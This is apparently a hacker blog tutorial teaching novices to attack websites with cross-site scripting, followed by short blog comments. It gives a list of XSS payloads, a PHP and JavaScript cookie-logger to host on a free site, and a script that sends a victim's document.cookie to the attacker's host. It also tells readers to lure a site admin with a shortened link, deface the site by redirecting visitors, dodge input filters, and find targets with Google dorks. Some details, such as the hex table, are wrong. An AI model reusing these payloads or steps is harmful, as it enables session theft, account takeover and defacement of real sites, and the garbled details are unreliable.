Guide For Xss Hacking

Hello fellas,
Here is another tutorial written out by me.Enjoy learning XSS hacking with me Awink
I will try to make this as short as possible by covering only the basics so that it helps noobs to understand Smiling

So i will start like always

Whats XSS ?

Here’s what wikipedia says :
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 80.5% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site’s owner.

Attack !

So in this section we will be learning how to use XSS to gain control over some website.So this is for a real noob who don’t know anything about it Smiling

So like in all other hacking ,XSS also starts by finding a vulnerability.But you may need to do several things to know whether a website is really vulnerable.

So first off, remember this.A website which has something like a search box,login space or anything similar is mostly XSS vulnerable.

So for this first attack,we will be using a search box.
So put this little piece of code in the box and hit enter Smiling

Quote:<script>alert(“XSS”)</script>

Now you can see its a very simple script,hence enclosed in script tags.The script is to alert a simple message,XSS.Now if a little box pop uped saying XSS, Congrats ! Your website is vulnerable ! Now if nothing comes up ,it means the website has filtered out it.This filter can easily be bypassed by us.There are many types of filters and most of the times,its blocking the alert box.

So in your code,you enclosed the message “XSS” in double quotes.So the system know you are trying XSS hacking since it was enclosed in double quotes.So we have to encrypt our message to fool the system :)Clever uh?

So now we use a little function called “String.FromCharCode”.So what this does is encrypt our text to ASCII language..Here is an example of how it looks :

Quote:String.fromCharCode(88,83,83)

Now 88,83,83 are ASCII values for X S S.Check this link to learn the conversion table.
http://www.ascii.cl/
Not necessary though Toungee
So now enter this newly formatted code into the search box and hit enter.

Quote:<script>alert(String.fromCharCode(88,83,83))</script>

The special thing is that you dont need to use quotes in this case since this function is used :)Now you must get the pop up box in most cases.
Else there are many other code pieces that you can enter yourself.You can make codes yourself and enter it if you know some coding Smiling
Here are some more code pieces i found on the net that you can use to do this :

Quote:“><script>alert(“XSS”)</script>
“><script>alert(String.fromCharCode(88,83,83))</script>
‘><script>alert(“XSS”)</script>
‘><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT(“XSS”)</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
“><ScRIPt>aLeRT(“XSS”)</ScRIPt>
“><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
‘><ScRIPt>aLeRT(“XSS”)</ScRIPt>
‘><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert(“XSS”)</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
“/><script>alert(“XSS”)</script>
“/><script>alert(String.fromCharCode(88,83,83))</script>
‘/><script>alert(“XSS”)</script>
‘/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>”><SCRIPT>alert(“XSS”)</SCRIPT>
</SCRIPT>”><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>”>”><SCRIPT>alert(“XSS”)</SCRIPT>
</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“;alert(“XSS”);”
“;alert(String.fromCharCode(88,83,83));”
‘;alert(“XSS”);’
‘;alert(String.fromCharCode(88,83,83));’
“;alert(“XSS”)
“;alert(String.fromCharCode(88,83,83))
‘;alert(“XSS”)
‘;alert(String.fromCharCode(88,83,83))

These queries alone must be able for you to hack any type of websites.Even the biggest websites might be having some XSS vulnerabilities that you can find using these dorks.

Advanced XSS

Now we will learn how to use these things to attack websites.Keep in mind that this is completely illegal and you can be caught and can be charged for criminal offense for doing this.So take precautions always.

Cookie Stealing

So now we will use the Cookie stealing method to do the attack.It is a special type of cookie/logger that logs the user that accesses that page.So there are many ways to do that but here is one easy method.
So in this method ,you need to setup a website.So go to some web hosting sites.I prefer http://www.000webhost.com and create an account on that website.Go to file manager and create a new text file in it.Name it anything like cookielog.txt or something like that.Don’t enter anything to it.Leave it blank.Create another txt file and name it something different.For example cookiellogger.txt.So we will be adding some code into it so that it can send logs to the cookielog.txt file.So open the 2nd text file and enter this code :

Quote:<?php

if(strlen($_SERVER[‘QUERY_STRING’]) > 0) {
$fp=fopen(‘./CookieLog.txt’, ‘a’);
fwrite($fp, urldecode($_SERVER[‘QUERY_STRING’]).”\n”);
fclose($fp);
} else {
?>

var ownUrl = ‘http://&lt;?php echo $_SERVER[‘HTTP_HOST’]; ?><?php echo $_SERVER[‘PHP_SELF’]; ?>’;

function URLEncode(str)
{
// The Javascript escape and unescape functions do not correspond
// with what browsers actually do…
var SAFECHARS = “0123456789” + // Numeric
“ABCDEFGHIJKLMNOPQRSTUVWXYZ” + // Alphabetic
“abcdefghijklmnopqrstuvwxyz” +
“-_.!~*'()”; // RFC2396 Mark characters
var HEX = “0123456789ABCDEF”;

var plaintext = str;
var encoded = “”;
for (var i = 0; i < plaintext.length; i++ ) {
var ch = plaintext.charAt(i);
if (ch == ” “) {
encoded += “+”; // x-www-urlencoded, rather than %20
} else if (SAFECHARS.indexOf(ch) != -1) {
encoded += ch;
} else {
var charCode = ch.charCodeAt(0);
if (charCode > 255) {
alert( “Unicode Character ‘”
+ ch
+ “‘ cannot be encoded using standard URL encoding.\n” +
“(URL encoding only supports 8-bit characters.)\n” +
“A space (+) will be substituted.” );
encoded += “+”;
} else {
encoded += “%”;
encoded += HEX.charAt((charCode >> 4) & 0xF);
encoded += HEX.charAt(charCode & 0xF);
}
}
} // for

return encoded;
};

cookie = URLEncode(document.cookie);
html = ‘<img src=”‘+ownUrl+’?’+cookie+'”>’;
document.write(html);

< ?php
}
?>

So that is the cookielogger script.Now we need to send this to the website admin of the target website.So most probably the admin wont look it.Since we have to convince him,we will shorten the url.Go to http://www.spam.com/ and shorten your URL.And since we want to add vulnerability ,we need to add some code too .So add this code after the URL and shrink it.

Quote:<script>document.location=”http://www.host.com/mysite/CookieLogger.php?cookie=&#8221; + document.cookie;</script>

Send the link to the admin and wait for him to click it.You need to be lucky for the admin to click it :)Once he has clicked it ,you will get the cookie.Now you can use some tools like cookie manager addon that you get for Mozilla and play around it .Its a very good addon and really helps to do a lot !

The Deface

So now we can deface the website.That is ,publishing that you have gained control over the website by making a deface page or something.Now you need to use a small script to redirect everyone that visits the website to the deface page.

Quote:<script>window.location=”http://www.pastehtml.com/YOURDEFACEHERE/&#8221;;</script>

Replace the syntax with your website deface page.

Bypassing the XSS Filter

So most of the times,the simple script wont give the pop up message.It wont bypass the filter.So you have to use some other methods.I will discuss some of them below.

Hex Bypassing

With blocked characters like >, <, and /, it is quite difficult to execute an XSS query. Not to worry, there’s always a solution Smiling You can change your characters, into Hex. A Hex of a certain character, is basically the character, but in a different format. These should help you out:

> = %3c
< = %3c
/ = %2f

ASCII Bypassing

With an ASCII encryption, we can use the character “. Which is blocked quite a bit. This is one of the most common XSS Filter bypasses of all time. A script that you would need to encrypt, would look like this:

Quote:<script>alert(“XSS”)</script>

And this must be working :

Quote:<script>alert(“XSS”)</script>

To encrypt your little part of a script, go to this site: http://www.wocares.com/noquote.php

Case-Sensitive Bypassing

This kind of bypass rarely works, but it’s always worth a shot. Some filters are set in place to detect certain strings, however, the filter’s strings that are blocked are CASE SENSITIVE. So all we need to do, is execute a script, with different sizes of characters. This bypass, would look like this:

Quote:<ScRiPt>aLeRt(“XSS”)</ScRiPt>

You can also mix that with ASCII encryption if you like. This kind of bypass only works on really stupid filters, or really REALLY old ones.
And last i am giving out some XSS dorks that you can try out on google.

Quote:inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx

Thats it for this tutorial
Thanks for reading

Advertisements

5 thoughts on “Guide For Xss Hacking

  1. Link Building

    Thanks for sharing excellent informations. Your web site is so cool. I’m impressed by the details that you’ve on this site. It reveals how nicely you perceive this subject. Bookmarked this website page, will come back for more articles. You, my friend, ROCK! I found just the information I already searched all over the place and just could not come across. What a great site.

    Reply
    1. rain112 Post author

      Thanks a lot for the +ve feedback.Im glad to hear i could teach more ! Be sure to come back and share this blog to your friends and keep supporting me 🙂

      Reply

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s